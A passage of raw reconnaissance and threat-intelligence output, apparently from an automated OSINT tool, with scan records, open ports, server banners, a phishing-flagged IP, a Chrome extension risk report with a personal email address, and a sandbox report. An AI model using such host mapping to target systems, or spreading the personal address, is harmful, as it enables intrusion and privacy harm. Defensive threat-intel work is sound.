\n\n', u'time': u'2022-11-02T14:11:37.246095128Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'81.88.52.232', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'l9explore', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'Apache', u'fingerprint': u''}}, u'event_fingerprint': u'b68e7b05331a65e14dbcf4d69984c02bb568a5e4c9e98cc272900fd881238da7', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'ip4scout', u'l9tcpid', u'l9explore'], u'http': {u'status': 200, u'title': u'', u'url': u'/info.php', u'header': {u'content-length': u'163', u'server': u'Apache'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': None, u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'81.88.52.232', u'summary': u'HTTP/1.1 200 OK\r\nDate: Sun, 30 Oct 2022 21:25:44 GMT\r\nServer: Apache\r\nUpgrade: h2,h2c\r\nConnection: Upgrade, close\r\nLast-Modified: Wed, 17 Jun 2020 20:01:33 GMT\r\nETag: "15a07ba-a3-5a84d20652140"\r\nAccept-Ranges: bytes\r\nContent-Length: 163\r\nContent-Type: text/html\r\n\r\n', u'time': u'2022-10-30T21:26:07.772470369Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'81.88.52.232', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'Apache', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731394c1060944c581e71c8735a4adbee3c1eab245151f0e84b', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'301 Moved Permanently', u'url': u'', u'header': {u'content-length': u'248', u'location': u'https://expochoc4.wixsite.com/moncoutant', u'server': u'Apache'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_256_GCM_SHA384', u'jarm': u'2ad2ad16d2ad2ad00042d42d0000006a78f6757b72f02e234bb3f6d2d5740b', u'certificate': {u'domain': [u'expochoc.com', u'www.expochoc.com'], u'cn': u'www.expochoc.com', u'valid': True, u'not_after': u'2023-02-12T16:54:14Z', u'key_size': 2048, u'issuer_name': u'R3', u'fingerprint': u'404ab2a8a06bb8db71a545c926cbd543f0f568cbb63894ece72a5aa7ac95dffa', u'key_algo': u'RSA', u'not_before': u'2022-11-14T16:54:15Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'expochoc.com', u'summary': u'Date: Mon, 14 Nov 2022 17:54:49 GMT\r\nServer: Apache\r\nLocation: https://expochoc4.wixsite.com/moncoutant\r\nContent-Length: 248\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\nPage title: 301 Moved Permanently\n\n\n\n301 Moved Permanently\n\n

Moved Permanently

\n

The document has moved here.

\n\n', u'time': u'2022-11-14T17:54:48.987769642Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'81.88.52.232', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'Apache', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731394c10605e8f0c992595628f0c5b762d79418a4cf5a99293', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Jean Pascal SIMOND', u'url': u'', u'header': {u'content-length': u'9758', u'server': u'Apache'}, u'length': 0, u'favicon_hash': u'', 81.88.52.232 2022-12-18 00:06:45 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.fi plague.fun 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None sparte.plague.fun plague.fun 2022-12-18 00:22:01 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2a06:98c1:3121::1 2022-12-18 00:07:47 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.in plague.fun 2022-12-18 00:08:59 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.0:443 188.114.97.0 2022-12-18 00:18:27 Affiliate - Internet Name No DNS Resolver 0 0 2 0 None smtp-fr.securemail.pro smtp.zerotwo-best-waifu.online 2022-12-18 00:16:58 Web Content Type No Web Spider 0 0 4 0 None application/javascript http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js 2022-12-18 00:13:36 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None noc@cloudflare.com {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'whitelist', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2022-06-23 00:42:26', u'asn_date': u'2014-03-28 00:00:00', u'tag': [u'phishing'], u'postal_code': u'94107', u'is_mining_pool': False, u'ip_addr': u'104.21.7.179', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'San Francisco', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 37.751, u'lon': -97.822}, u'type': u'ip', u'email': [u'noc@cloudflare.com', u'rir@cloudflare.com', u'abuse@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'OpenPhish', u'first_seen': u'2022-06-23 00:42:26', u'last_seen': u'2022-06-24 12:40:18'}], u'modification_time': u'2022-06-24 12:40:18', u'asn_cidr': u'104.21.0.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'104.16.0.0/12'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': True, u'as_name': u'AS13335 CloudFlare', u'is_vpn_node': False} 2022-12-18 00:09:16 Physical Location No LeakIX 0 0 2 0 None Campinas, Sao Paulo, Brazil 20.226.56.97 2022-12-18 00:24:07 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None anonymous69anonymous666@gmail.com [{"platform": "Chrome", "version": "1342", "data": {"webstore": {"website": "", "rating": 0, "privacy_policy": "", "last_updated": "2018-09-27", "name": "Plague Inc", "price": "", "offered_by": "", "support_site": "", "version": "", "address": "", "short_description": "Can you infect the world? Plague Inc. is a unique mix of high strategy and terrifyingly realistic simulation.\n\nYour pathogen has\u2026", "permission_warnings": ["Your data on clients2.google.com", "Data you copy and paste"], "users": 253, "size": "50.13MiB", "type": "Application", "email": "anonymous69anonymous666@gmail.com", "rating_users": 0, "icon": "https://lh3.googleusercontent.com/0_Mq-WxO413qMWau9uPHeHGIf8oFRv6Pr-BYRbRI6hUWCZAeR2EyFBZsrsNatcARd1rEtJMgKqM=w128-h128-e365"}, "risk": {"metadata": {}, "total": 91, "webstore": {"website": 1, "privacy_policy": 1, "last_updated": 5, "users": 1, "address": 1, "total": 11, "support_site": 1, "rating_users": 1}, "permissions": {"total": 80}}, "related": {"piamnadekmbodeiimejmegflchadggmh": {"rating": 3.2055554, "users": 10000, "platform": "", "short_description": "Choose a Virus, Bacteria or Parasite then upgrade and spread your disease across the world in an attempt to overtake the human race!", "icon": "https://lh3.googleusercontent.com/qKxm4GKoTwtCrlGzq-R99mOkHlkun0o6mILRzTNXLUe_ZKbK9uPfzT9jlcf4ybCuGYm8AQCHeISCWuUagDorKjk4Eg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 180, "name": "Pandemic 2"}, "jgaeopgjojikeoiidmfaejkifhgjoooe": {"rating": 4.1774006, "users": 200000, "platform": "", "short_description": "Command & Conquer Tiberium Alliances introduces an all new way to play with your friends in a browser-based, free to play strategy\u2026", "icon": "https://lh3.googleusercontent.com/SHJ9waduwbmAP1N8APS22MO-6jknRoVdKhhk3pOGGyQvfTYTghPOowts7-UmXIcXaIHwo6AAoPs9kOIByoq0W5enVx0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4301, "name": "Command & Conquer Tiberium Alliances"}, "fmfibdjbnmndigbklnlllakjbjheiopj": {"rating": 4.670669, "users": 80000, "platform": "", "short_description": "Defend your Kingdom against the forces of evil in this awesome sequel of the epic tower defense game!", "icon": "https://lh3.googleusercontent.com/wu5zLD3jvbWc9uM_VYT1oN5jJzNQ8_3yZ_rc_ovT-Mkl4FCmic6btZ8Oi1xSowhbkeoUQ6S2V2YAN85spLeO-eSw8Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1749, "name": "Kingdom Rush Frontiers"}, "bofmomibemibekfhdnbndompcedgimfl": {"rating": 3.931174, "users": 10000, "platform": "", "short_description": "Might and Magic Heroes Online - Easy to pick up, beautiful & for free. Play it your way by yourself or with friends!", "icon": "https://lh3.googleusercontent.com/8bHGiLjl0PwDAltU95Z1CZiqLsdp5GZOxR0bthAz-wGBXy5f36WuFx3W0UrA2C6DK3ygcBbn019I76bZ5qfhWcUMx_g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 247, "name": "Might and Magic Heroes Online"}, "gohldomknihdgjdinaabghnpnkjhkgcm": {"rating": 3.7919075, "users": 10000, "platform": "", "short_description": "Lunaria Story is a 2D, side-scrolling, massively multiplayer online role-playing game (MMORPG).", "icon": "https://lh3.googleusercontent.com/rYfXlSeN63sJW6ll6pKFK-MqErn5KGPgUz7qxlikWS3SUyAGcEJBDS38OKLMBTqbQxDZrqz-1Yp0aysTJBUnIaUu=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 173, "name": "Lunaria Story"}, "khgabmflimjjbclkmljlpmgaleanedem": {"rating": 4.4696846, "users": 200000, "platform": "", "short_description": "The only chess game that puts fun first. Play against the computer or challenge your friends online!", "icon": "https://lh3.googleusercontent.com/7rE6PLLaxuDaQYoBzsNvdrRCGyHGAEWXNGyNcAAOVkDNnbvJMw6WGHIknQy4xF_w33MrPkNquEC-Q7CKzBOh4_3Log=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 6119, "name": "SparkChess"}, "ppmiljlihhlfoekfknliaimndefafdml": {"rating": 3.8549619, "users": 10000, "platform": "", "short_description": "Fight with elves and dwarves against orcs and the forces of evil! Defend your city and become the most powerful lord of all!", "icon": "https://lh3.googleusercontent.com/XEp8ZomRS2zcjXMgyxguYq63-oZdJyXjLndPVteO79qXVwuVeYX5cgZTKFz1lE2rZ-rba7r1_hVNrROK7hqYRzIA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 131, "name": "Shadow Kings"}, "clkfdgnfefjmciocbhnffnbpkjpdleca": {"rating": 3.8338633, "users": 70000, "platform": "", "short_description": "Throw on your overalls and hit the fields!
Take home the blue ribbon as farmer of the year!", "icon": "https://lh3.googleusercontent.com/-biu79UGgMFr7LA32bnfg26g8pssU8e_Uvta1ysUUa1ainkKHGQdlBDTHKpKGGtc5rC254AVzmDmtNvqBr_VomUHHg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1258, "name": "FARMERAMA"}, "kkiklippbohodiogcpjgbjagfbajpobc": {"rating": 3.8280256, "users": 10000, "platform": "", "short_description": "Do you have what it takes to become a Legend? Gather your forces and prepare your heroes for battle in Legends of Honor!", "icon": "https://lh3.googleusercontent.com/4xUCZSCGvpG6yrO75panShmTUmoqOIVgWkPNMVzaQQUZf1tJnjKAqIsD6VPrtXPW7Yx1DIMvTHSnCicc0MOuFgUB=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 157, "name": "Legends of Honor"}, "beoejcompfcffbdhaknieiimbkakdbof": {"rating": 3.813187, "users": 23071, "platform": "", "short_description": "Help fire boy and water girl in their adventure.", "icon": "https://lh3.googleusercontent.com/Mi8D4FGay9rMrsOzg2ZsG5O8PN8vFSYRieCdbBjg6pT1JtCbd8Vf5tBlVeVG2rCfUReMLntT7AY=w128-h128-e365", "rating_users": 91, "name": "Fireboy And Watergirl"}, "hgmpilchchdmdnibhgnjjbghglgffgjp": {"rating": 3.74, "users": 9000, "platform": "", "short_description": "The 2nd World War: Tank clashes, Naval battles, Air combat. In Call of War you rewrite the course of history!", "icon": "https://lh3.googleusercontent.com/rca81fkmlP_1deL76lVVgQFDHHJXV_nrrgWrhh7fjRpGxlaiJ0LI7fDh-kcT_s0XFy4c48qzyB04TgzXqxpDlA3_=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 100, "name": "Call of War"}, "anaphblkfplenhkephgneolhnmjminjg": {"rating": 4.038013, "users": 100000, "platform": "", "short_description": "In Forge of Empires, you control the fate of your city throughout different historical periods.", "icon": "https://lh3.googleusercontent.com/o7i1oeutKe1UW8s0ECUXnCi6VplTAYUoMLQp7S9ba9f1efR1X7M7jFlgS49CclfFbMRwhHBtmDDkEyP9Yj2Az439qA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2315, "name": "Forge of Empires"}, "apkldkehnmnkbcgkjbgchjghikcggpog": {"rating": 3.2212389, "users": 20000, "platform": "", "short_description": "Online webbrowser strategy game in a post apocolypitic world. Can you keep your town save from disaster?.", "icon": "https://lh3.googleusercontent.com/0KswqoNp3hk_FgGlha8lmXu-HFJWa3qpgiYFGU3LrU-wByWj5oP-rlJwo0X06dhrE9Sp-erRV3zqs5zI0FQfNfn-R9E=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 226, "name": "The Outbreak - Webbrowser strategy game"}, "agcokacflmihcgkgjofglkhobjkheeic": {"rating": 3.8041544, "users": 30000, "platform": "", "short_description": "Destiny calls. Will you die a wretched slave, or stand firm as a hero?", "icon": "https://lh3.googleusercontent.com/oTY2iF97936IRTmOkZkx-MxwWIvePEvhsEp5yn8SUpkJrafBb3saf-EHkzhbLqrtfpz6bEjy=w128-h128-e365", "rating_users": 337, "name": "Sparta: War of Empires"}, "llmmanebcflnklopeacnlgkpiehfacmd": {"rating": 3.958115, "users": 20000, "platform": "", "short_description": "Build a powerful army, show no mercy, and battle enemies for earth's last remaining resources in this massive real-time strategy\u2026", "icon": "https://lh3.googleusercontent.com/4DtWVAXXT8ndzKB9YfQArB4A6w3qcTI8bQVg2Im1vRDF6Pqdg7V14P3a6MKXBcsHumlr95n88bvwfJolkQkZgiVE=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 382, "name": "War Commander"}, "kkgkognjknhcgbgbeijjondlikfkgnog": {"rating": 4.0218296, "users": 60000, "platform": "", "short_description": "Build magnificent cities, forge mighty alliances, utilize the power of the gods, conquer the world!", "icon": "https://lh3.googleusercontent.com/DicNXkYIbO-QUz_W3yfBwAs7qIk53yXJIP43hOOIt99y2-daHB0rwKkYPTTv76ItPjbbDqQ77UMFV12LNg_IHPtRMNI=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 962, "name": "Grepolis"}, "jfknmahjfliijedjbhonlmjenllgjhgj": {"rating": 3.8932583, "users": 84980, "platform": "", "short_description": "Battle live players in this turn-based artillery game!", "icon": "https://lh3.googleusercontent.com/IgOZ8fb6-DdXq5c60EdLxFv51B5mUeyXdp4yqEVyGP9h3OBTY0Jpo1upRAr-DzlDW4sWSwUG=w128-h128-e365", "rating_users": 178, "name": "Territory War 3"}, "hondhndnlnmjbmlgjigpicjoijbecdgn": {"rating": 3.6326923, "users": 90000, "platform": "", "short_description": "Brutal mercenary warfare, bleeding-edge technology, no holds barred.", "icon": "https://lh3.googleusercontent.com/n-nIo0f73nDmoRGSdd4XTETH15Wu6z2dgBNH7i7xYo4-GHhA1G3IDOmUONbdG1OZhVTlg5PT7jE=w128-h128-e365", "rating_users": 520, "name": "Soldiers Inc."}}, "manifest": {"oauth2": {"scopes": [], "client_id": "133701689125-jj0hr4gb0ff4ulsbrn0uk2i4th946d4c.apps.googleusercontent.com"}, "arc_metadata": {"apkList": ["app-release"], "enableExternalDirectory": false, "useGoogleContactsSyncAdapter": false, "usePlayServices": ["gcm"], "orientation": "landscape", "formFactor": "fullscreen", "packageName": "com.miniclip.plagueinc", "resize": "reconfigure", "name": "com.miniclip.plagueinc"}, "name": "Plague Inc", "default_locale": "en", "icons": {"128": "icon.png", "16": "icon.png"}, "app": {"background": {"page": "app_main.html"}}, "requirements": {"3D": {"features": ["webgl"]}}, "offline_enabled": true, "version": "1342", "manifest_version": 2, "import": [{"id": "mfaihdlpglflfgpfjcifdjdjcckigekc"}], "update_url": "https://clients2.google.com/service/update2/crx", "permissions": ["gcm", {"socket": ["tcp-connect", "tcp-listen", "udp-bind", "udp-send-to", "resolve-host"]}, "unlimitedStorage", "notifications", "clipboardRead", {"fileSystem": ["write"]}, "https://clients2.google.com/", "videoCapture", "clipboardWrite", "identity.email", "alarms", "storage", "identity", "audioCapture"]}}, "extension_id": "dnejacfgfaldfjameaaaledklokkacbc"}] 2022-12-18 00:09:36 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.12:443 188.114.96.0/24 2022-12-18 00:22:04 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 404 Not Found TE: chunked Transfer-Encoding: chunked Content-Type: text/html 90.116.166.104 2022-12-18 00:18:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.3:8443 188.114.97.0/24 2022-12-18 00:08:30 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.52.223:80 81.88.52.223 2022-12-18 00:04:29 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.21.28.240', u'104.16.85.20', u'99.84.167.3', u'99.84.170.89', u'13.249.90.138'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://consolegames.down10.software/bios/pcsx2-playstation-2-bios-3', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "svg-sprite.4da5413f5086c5755b46094b813dbfcd_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.28.240:443"\n "142.250.72.130:443"\n "104.16.85.20:443"\n "142.251.40.35:80"\n "199.232.192.134:443"\n "142.250.68.34:443"\n "142.250.217.130:443"\n "172.217.14.98:443"\n "151.101.64.134:443"\n "99.84.167.3:443"\n "199.232.192.64:443"\n "99.84.170.89:80"\n "142.250.68.65:443"\n "142.250.68.98:443"\n "142.250.188.227:443"\n "77.88.21.119:443"\n "13.249.90.138:80"\n "154.47.36.46:443"\n "142.251.40.42:443"\n "192.184.69.149:443"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" touched "WinInetBroker Class" (Path: "HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}")\n "iexplore.exe" touched "PSFactoryBuffer" (Path: "HKCU\\CLSID\\{057EEE47-2572-4AA1-88D7-60CE2149E33C}")\n "iexplore.exe" touched "Network List Manager" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32")\n "iexplore.exe" touched "Cor MIME Filter, CorFltr, CorFltr 1" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1E66F26B-79EE-11D2-8710-00C04F79ED0D}\\PROGID")\n "iexplore.exe" touched "Groove Folder Synchronization" (Path: "HKCU\\CLSID\\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}\\TREATAS")\n "iexplore.exe" touched "Groove GFS Browser Helper" (Path: "HKCU\\CLSID\\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\\TREATAS")\n "iexplore.exe" touched "MSAA AccPropServices" (Path: "HKCU\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\INPROCSERVER32")\n "iexplore.exe" touched "Task Bar Communication" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{56FDF344-FD6D-11D0-958A-006097C9A090}\\INPROCSERVER32")\n "iexplore.exe" touched "Internet Explorer(Ver 1.0)" (Path: "HKCU\\CLSID\\{0002DF01-0000-0000-C000-000000000046}\\PROGID")\n "iexplore.exe" touched "WebBrowserHandler Proxy" (Path: "HKCU\\CLSID\\{3CB169B3-17D9-4E47-8B93-2878998F69A2}\\TREATAS")\n "iexplore.exe" touched "PSDispatch" (Path: "HKCU\\CLSID\\{00020420-0000-0000-C000-000000000046}\\PROGID")\n "iexplore.exe" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "iexplore.exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\INPROCSERVER32")\n "iexplore.exe" touched "UsersFiles" (Path: "HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n "iexplore.exe" touched "Property System Both Class Factory" (Path: "HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS")\n "iexplore.exe" touched "Shockwave Flash Object" (Path: "HKCU\\CLSID\\{D27CDB6E-AE6D-11CF-96B8-444553540000}\\INPROCSERVER32")\n "iexplore.exe" touched "Security Manager" (Path: "HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS")\n "iexplore.exe" touched "NetworkListManager" (Path: "HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\\TREATAS")\n "iexplore.exe" touched "ShellWindows" (Path: "HKCU\\CLSID\\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}\\LOCALSERVER32")\n "iexplore.exe" touched "Office Document Cache Handler" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\\INPROCSERVER32")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "yandex.ocsp-responder.com"\n "ocsp.sectigo.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d78_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d78_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d78_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d78_IE_EarlyTabStart_0xc28_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d78_ConnHashTable<3448>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d78_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3448"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3448"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"\n "logo_1_.svg" has type "HTML document ASCII text with very long lines"\n "svg-sprite.4da5413f5086c5755b46094b813dbfcd_1_.svg" has type "SVG Scalable Vector Graphics image"\n "f_6_.txt" has type "ASCII text with very long lines"\n "739F2FF4259CDC6CBE7B90F1A95601EF" has type "data"\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"\n "KB64NSN3.txt" has type "ASCII text"\n "CWBMBUPF.txt" has type "ASCII text"\n "1B1F4BA66CDBFEC85A20E11BF729AF23_AA85F8F9DAFF33153B5AEC2E983B94B6" has type "data"\n "578YFEMC.txt" has type "ASCII text"\n "DJ234UW7.txt" has type "ASCII text"\n "ZPYEJW3Y.txt" has type "ASCII text"\n "GB5X8XH6.txt" has type "ASCII text"\n "iframe_1_.htm" has type "HTML document ASCII text with no line terminators"\n "E887E036775F4159E2816B7B9E527E5F_4C2E81DE76C8EDFC85D7A7D77938D5CD" has type "data"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"\n "709A8EC0F6D3194AD001E9041914421F_B8D287E220F7AC71F428E1008F0A1988" has type "data"\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"\n "7LDUCZHU.txt" has type "ASCII text"'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-55', u'name': u'Reads the registry for installed applications', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE"; Key: "DONTUSEDESKTOPCHANGEROUTER")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE"; Key: "PATH")'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"mc.yandex.ru" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', 